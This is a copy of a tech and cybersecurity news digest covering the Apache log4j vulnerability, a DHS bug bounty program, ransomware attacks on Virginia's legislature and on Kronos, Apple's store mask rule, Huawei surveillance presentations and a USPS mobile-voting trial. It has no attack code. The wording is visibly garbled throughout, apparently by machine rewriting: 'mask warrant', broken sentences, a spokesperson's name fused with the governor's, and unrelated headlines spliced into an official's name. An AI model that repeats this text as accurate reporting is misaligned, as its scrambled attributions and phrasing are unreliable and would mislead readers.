Hillicon Valley – Apache’s vulnerability raises alarm bells

Today it’s Tuesday. Welcome to Hillicon Valley, detailing everything you need to know about tech and cyber news from Capitol Hill to Silicon Valley. Subscribe here: thehill.com/newsletter-signup.

Follow The Hill journalist Maggie Miller (@ magmill95) and the technical team, Chris Mills Rodrigo (@millsrodrigo) and Rebecca Klar (@rebeccaklar_), for more coverage.

The red alarm bells continued to ring on Tuesday as cybersecurity professionals and government officials rushed to address the newly discovered vulnerability in the Apache log4j logging package, which left most countries vulnerable to cyber attacks. nation states and cybercriminals.

Meanwhile, the Department of Homeland Security announced a new program to allow approved hackers to scan agency systems for vulnerabilities, and Apple said it was once again instituting a mask warrant in stores.

Let’s move on to the news.

The newest cyber puzzle

A vulnerability in a widely used logging platform discovered late last week has forced security professionals and officials to scramble to respond and fix systems before other countries and cybercriminals can exploit the flaw.

The vulnerability of the Apache log4j logging package has potentially affected thousands of businesses around the world and is a particularly serious issue.

Big impact: “This is one of the worst vulnerabilities in vulnerability history,” Tom Kellermann, former member of an Obama administration cybersecurity committee and head of the company’s cybersecurity strategy, told The Hill on Monday. of VMware technology.

The vulnerability, first discovered at the end of last week, is serious because it is found in a system that underpins most business systems around the world and has been in use for decades.

“Think of Apache as one of the legs, one of the giant supports of a bridge that facilitates connective tissue between application worlds and computing environments,” Kellermann said. “If you could poison this medium, which is basically what our adversaries are going on right now, because you have active analysis and exploitation of this vulnerability, you could essentially destabilize these bridges.”

Ouch: Attackers are actively exploiting the problem, Check Point Software reporting Monday afternoon that it has witnessed “pandemic-like spread” since last week, with more than 800,000 attempted attacks in 72 hours and around 100 hacks per minute. Check Point said more than 40% of corporate networks around the world were under attack.

The government intervenes: Cybersecurity and Infrastructure Security Agency (CISA) Director Jen Easterly announced on Saturday that the log4j vulnerability had been added to the agency’s catalog of vulnerabilities, forcing federal agencies to address it immediately, and that the Joint Cyber CISA Defense Collaborative had set up a steering group to focus on the issue. The team includes partners from the FBI and the National Security Agency (NSA).

“To be clear, this vulnerability poses a serious risk,” Easterly said in a statement on Saturday. “We urge all organizations to join us in this essential effort and take action. ”

Read more here.

Federal authorities offer possibility to hack DHS

The Department of Homeland Security (DHS) on Tuesday announced a new bug bounty program to help tackle the agency’s cyber vulnerabilities.

The DHS Hack Program will allow approved cybersecurity experts to scan for vulnerabilities in certain external DHS systems and be paid by the ministry if they find any, which will allow DHS to harden its systems against attacks.

The program will run in three phases over the next fiscal year, the first phase involving virtual assessments of DHS networks, the second a live hacking event, and the third phase involving DHS evaluating the results.

“As the federal government’s cybersecurity quarterback, DHS must lead by example and constantly seek to strengthen the security of our own systems,” said the Secretary of Homeland Security. Alejandro mayorkasAlejandro MayorkasThe Memo: Biden faces test in the wake of tornadoes Biden will travel to investigate Kentucky damage on Wednesday McConnell congratulates Biden on response to Kentucky disaster MORE said Tuesday in a statement.

“The DHS Hack Program inspires highly skilled hackers to identify cybersecurity weaknesses in our systems before they can be exploited by bad actors. This program is an example of how the Department partners with the community to help protect our nation’s cybersecurity.

Read more here.


The Virginia General Assembly IT unit was hit by a ransomware attack, which prevented lawmakers and staff from accessing the bill management system.

Government spokesperson Alena Yarmosky. Ralph northam(D-Va.) Said in a statement on Monday that the cyberattack targeted the Automated Legislative Systems Division of the Legislative Branch, according to the Washington Post.

This agency represents the Virginia General Assembly on matters involving “computer technology, the collection and dissemination of legislative information, and the production and distribution of publications,” according to the group’s website, as cited by the Post.

The website had been inaccessible since Tuesday evening.

Read more here.

Hide yourself

Apple will require customers must wear masks in all U.S. stores as cases of COVID-19 increase, the company said on Tuesday.

“We regularly monitor conditions and will adjust our sanitary measures in stores to promote the well-being of customers and employees,” an Apple spokesperson said in a statement.

“Amid the increase in cases in many communities, we now require all customers to join our team members in wearing masks when they visit our stores.”

Apple is reinstating policy as coronavirus cases increase and new variants of the virus, including the highly transmissible omicron variant, propagation.

Read more here.


PowerPoint presentations from Chinese telecommunications giant Huawei Technologies indicate that the company is playing a larger role in China’s surveillance efforts than previously thought, according to the Washington Post.

The Post reviewed more than 100 Huawei PowerPoint presentations, many of which are labeled “confidential,” in which the company explained how the government could use its technologies to identify voices, track people for political purposes, and monitor the movements of people. inmates in prisons, among other surveillance. tactical.

“Huawei has no knowledge of the projects mentioned in the Washington Post report,” the company said in a statement to the newspaper. “Like all other major service providers, Huawei provides cloud platform services that meet common industry standards.”

Read more here.


Ultimate Kronos Group (UKG), a provider of human resources management, was hit by a ransomware attack earlier this week, the company confirmed.

Kronos executive vice president Bob Hughes confirmed the incident in a blog post published Monday. Hughes noted that the company became aware of the breach on December 11 and impacted Kronos’ private cloud, which includes UKG Workforce Central, UKG TeleStaff, Healthcare Extensions and Banking Scheduling Solutions.

Hughes warned that while the company worked to resolve the incident, it could impact Kronos Private Cloud systems for “several weeks.”

The attack could have a widespread impact on several large companies, including UKG customers including Tesla, Marriott, Yamaha, Samsung, Revlon, The Container Store and Peet’s Coffee and Tea.

Read more here.


An editorial to chew on: A powder army in the information age

Lighter click: Really wild race

Notable links on the web:

How Beijing influences influencers (The New York Times / Paul Mozur, Raymond Zhong, Aaron Krolik, Aliza Aufrichtig and Nailah Morgan)

The military is in hot water on TikTok’s recruiting activity (The Verge / Makena Kelly)

Amazon delivery drivers say they are sacrificing safety to cope with the rush of the holidays (Vice Motherboard / Lauren Kaori Gurley)

One last thing: a mobile voting system?

The U.S. Postal Service worked on a secret project testing a blockchain-based mobile phone voting system ahead of the 2020 election before finally abandoning the project, according to The Washington Post.

The effort was apparently carried out without any involvement from agencies focused on election security. According to the Post, the secrecy of the project has alarmed officials, who feared its news could spark plots and fuel mistrust of the U.S. electoral system.

Matt Masterson, a former senior advisor to the Cybersecurity and Infrastructure Security Agency (CISA) who served in the federal government when the mobile voting project was underway, said he was never aware of the Postal Service’s activities in this regard. which concerns the program.

“If you are doing anything in the electoral space, transparency should be the number one priority. There should be no guessing game around it, ”Masterson told the newspaper.

Read more here.

That’s all for today, thanks for reading. Discover The Hill’s Technology and cybersecurity pages for breaking news and coverage. See you on Wednesday.

Comments are closed.